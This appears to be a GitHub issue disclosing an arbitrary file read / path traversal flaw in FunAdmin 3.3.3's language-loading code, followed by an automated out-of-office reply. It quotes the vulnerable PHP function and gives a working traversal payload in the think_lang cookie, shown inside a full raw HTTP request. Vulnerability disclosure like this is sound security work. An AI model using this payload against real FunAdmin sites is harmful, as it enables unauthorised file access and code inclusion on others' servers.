search

funadmin / funadmin

全栈开发框架🔥🔥🔥FunAdmin是基于ThinkPHP8Layui开发的轻量级高颜值后台开发系统,集成Layui常用组件、CRUD生成快速模块,CMS免费商用 ,非常适合二开, 点击star支持下吧
https://www.funadmin.com/plugins
Apache License 2.0
137 stars 31 forks source link

A Arbitrary File Read Vulnerability exists in funadmin3.3.3 #20

Open scofield1920 opened 2 weeks ago

scofield1920 commented 2 weeks ago

Description: Arbitrary File Read Vulnerability exists in funadmin3.3.3 might allow attackers to read arbitrary files through web applications without being restricted by access control. This vulnerability may lead to sensitive information leakage, system crashes, and other issues. It can also read sensitive file information inside the computer.

Vulnerability Type: Arbitrary File Read Vulnerability

Affected component:app/common/controller/Backend.php

protected function loadlang($name,$app)
    {
        $lang = cookie(config('lang.cookie_var'));
        if(!empty($lang) && Str::contains($lang,'../')){
            return false;
        }
        if($app && $app!=='backend'){
            $res =  Lang::load([
                $this->app->getBasePath() .'backend'. DS . 'lang' . DS . $lang . '.php',
                $this->app->getBasePath() .$app. DS . 'lang' . DS . $lang  . '.php',
                $this->app->getBasePath() .$app. DS . 'lang' . DS . $lang . DS . str_replace('.', DS, $name) . '.php',
            ]);
       }else{
            $res = Lang::load([
                $this->app->getAppPath() . 'lang' . DS . $lang . '.php',
                $this->app->getAppPath() . 'lang' . DS . $lang . DS . str_replace('.', DS, $name) . '.php',
            ]);
        }
        return $res;

    }

Attack Vectors:

replace think_lang=....; with think_lang=/../../../addons/shell; such as : Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83;

GET / HTTP/1.1 Host: 127.0.0.1:8022 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1715701691 Connection: close

image

funadmin commented 2 weeks ago

这是来自QQ邮箱的假期自动回复邮件。   您好,我最近正在休假中,无法亲自回复您的邮件。我将在假期结束后,尽快给您回复。